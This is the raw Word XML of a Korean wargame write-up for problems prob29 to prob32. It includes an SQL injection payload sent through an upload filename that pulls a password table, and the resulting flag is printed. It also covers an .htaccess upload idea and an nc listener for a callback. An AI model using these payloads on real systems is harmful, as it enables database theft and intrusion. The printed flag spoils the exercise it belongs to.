          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AEC62B6" wp14:editId="641534E1">
            <wp:extent cx="4305300" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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Default="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 데이터가 날아가니 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스푸핑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해서 </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htacces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 보내자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F79" w:rsidRDefault="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C5ECE88" wp14:editId="460589B4">
            <wp:extent cx="4600575" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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Default="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4588E36D" wp14:editId="45FE4EE7">
            <wp:extent cx="4686300" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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Pr="00423F79" w:rsidRDefault="00423F79" w:rsidP="00423F79">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00423F79">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00423F79">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F79" w:rsidRDefault="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04015524" wp14:editId="2AE69BB6">
            <wp:extent cx="2895600" cy="1657350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4E" w:rsidRDefault="000A2E4E" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">파일을 올리고 </w:t>
      </w:r>
      <w:r>
        <w:t>/upload/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kktxt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 가봤더니</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007513FF" w:rsidRDefault="007513FF" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1624380F" wp14:editId="24B559E7">
            <wp:extent cx="5305425" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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FF" w:rsidRDefault="007513FF" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자신의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP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써있다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007513FF" w:rsidRDefault="007513FF" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE00B5F" wp14:editId="327D5AFD">
            <wp:extent cx="3667125" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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FF" w:rsidRDefault="007513FF" w:rsidP="007A1C45"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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명을 보여준다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nsert, select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 거치는 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441260" w:rsidRDefault="00441260" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nsert into c29_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A85C13">
        <w:t>?,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A85C13">
        <w:t xml:space="preserve"> ?, ?) values (?, ?, ?) </w:t>
      </w:r>
      <w:r w:rsidR="00A85C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이런 식으로 구성되어 있을 것이라고 짐작할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85C13" w:rsidRDefault="00A85C13" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그럼 </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 몇 번째로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>되는지 알아보자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85C13" w:rsidRDefault="00A85C13" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>맨 마지막이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-&gt;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u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pload error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85C13" w:rsidRDefault="00A85C13" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>두 번째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-&gt;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u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pload error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85C13" w:rsidRDefault="00A85C13" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>첫 번째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</w:p>
    <w:p w:rsidR="004D318B" w:rsidRDefault="004D318B" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CC9FA11" wp14:editId="16CFC6D7">
            <wp:extent cx="4953000" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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8B" w:rsidRDefault="004D318B" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아주 잘 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D318B" w:rsidRDefault="004D318B" w:rsidP="00A85C13"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(select password from c29_tb)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aaa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bbb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이라고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전송했을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때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,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D318B" w:rsidRDefault="004D318B" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21CE432E" wp14:editId="2DD1E092">
            <wp:extent cx="2400300" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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8B" w:rsidRDefault="004D318B" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이렇게만 뜬다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉 앞의 쿼리가 먹히지 않고 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t>ime</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 맞춰줄 수도 있고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E0899">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 맞춰줄 수도 있다.</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t xml:space="preserve"> replace</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 치환하고 있으므로 h</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t>ex</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값으로 보내도록 하겠다.</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">일단 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="000E0899">
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E0899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 몇 번째 칼럼인지도 모르는 상태이니 둘 다 넣어보도록 하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0899" w:rsidRDefault="000E0899" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA0B5B0" wp14:editId="48CA5E2C">
            <wp:extent cx="3629025" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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9" w:rsidRDefault="000E0899" w:rsidP="00A85C13">
      <w:pP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(select password from c29_tb)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aaa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char(0x32,0x31,0x38,0x2e,0x31,0x34,0x36,0x2e,0x32,0x30,0x2e,0x36,0x31)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</w:p>
    <w:p w:rsidR="00CD7CBE" w:rsidRDefault="00CD7CBE" w:rsidP="00A85C13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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿼리가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보내진다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filename </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">컬럼은 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">형이므로 편하게 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>컬럼에 명령을 보내도록 하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7CBE" w:rsidRDefault="00CD7CBE" w:rsidP="00A85C13">
      <w:pP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krrr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(select password from c29_tb), char(0x32,0x31,0x38,0x2e,0x31,0x34,0x36,0x2e,0x32,0x30,0x2e,0x36,0x31)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</w:p>
    <w:p w:rsidR="00CD7CBE" w:rsidRDefault="00CD7CBE" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039E4E9D" wp14:editId="3E87DD21">
            <wp:extent cx="3543300" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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BE" w:rsidRDefault="00CD7CBE" w:rsidP="00A85C13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lag is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>60e302b197b5650980b1299e27b55e5a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7CBE" w:rsidRPr="00CD7CBE" w:rsidRDefault="00CD7CBE" w:rsidP="00CD7CBE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7CBE">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD7CBE" w:rsidRDefault="00CD7CBE" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C843001" wp14:editId="56D69A45">
            <wp:extent cx="5638800" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="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E" w:rsidRDefault="00EF696E" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52EBE8D1" wp14:editId="7EB5BF62">
            <wp:extent cx="5353050" cy="3228975"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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E" w:rsidRDefault="00EF696E" w:rsidP="00A85C13">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ysql_connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수의 인자가 없는 경우에는 웹 서버 설정 값에서 D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>연결 대상 정보를 가져온다고 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하면 될 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3AFB" w:rsidRDefault="007B3AFB" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B451766" wp14:editId="682777DF">
            <wp:extent cx="5731510" cy="2282190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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B" w:rsidRDefault="007B3AFB" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>위와 같이 로컬에서 테이블을 만든다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3AFB" w:rsidRDefault="007B3AFB" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E4F47B" wp14:editId="3E6FE6C2">
            <wp:extent cx="4248150" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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B" w:rsidRDefault="007B3AFB" w:rsidP="00A85C13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m</w:t>
      </w:r>
      <w:r>
        <w:t>anual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 참고하여 </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 작성한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3AFB" w:rsidRDefault="002E1146" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E031433" wp14:editId="362910C3">
            <wp:extent cx="5731510" cy="1005840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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6" w:rsidRDefault="002E1146" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지만 서버가 업데이트 되면서 .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 서버에 올라가지를 않네요.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1146" w:rsidRPr="002E1146" w:rsidRDefault="002E1146" w:rsidP="002E1146">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1146">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1146">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1146" w:rsidRDefault="002E1146" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBDDDBA" wp14:editId="2A36D7D7">
            <wp:extent cx="5731510" cy="993140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0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6" w:rsidRDefault="000230F1" w:rsidP="00A85C13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그냥 공인 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">사설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포트 포워딩을 </w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해주고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F75F1">
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:t>10000</w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부터 </w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:t>10100</w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>까지의 포트를 열어 소켓 연결을 하면 되는데 K</w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:t xml:space="preserve">ITRI </w:t>
      </w:r>
      <w:r w:rsidR="004F75F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공유기에 포트 포워딩을 할 수는 없으므로 풀지 못했다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="00A85C13"/>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F75F1">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="004F75F1">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC97DA0" wp14:editId="3DAF0F35">
            <wp:extent cx="4152900" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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>?</w:t>
      </w:r>
      <w:r>
        <w:t>??</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47471942" wp14:editId="3F46C1B9">
            <wp:extent cx="3829050" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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 xml:space="preserve">내리다 보면 </w:t>
      </w:r>
      <w:r>
        <w:t>Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1066BC64" wp14:editId="44E45546">
            <wp:extent cx="1933575" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="9525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 xml:space="preserve">그리고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vote_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키가 생겼다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D898853" wp14:editId="044929B8">
            <wp:extent cx="5391150" cy="1905000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을 누르면 </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r>
        <w:t>vote = add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F75F1" w:rsidRDefault="004F75F1" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFE2B85" wp14:editId="24783505">
            <wp:extent cx="5229225" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="9525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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>avystar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 누르면 </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hit = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
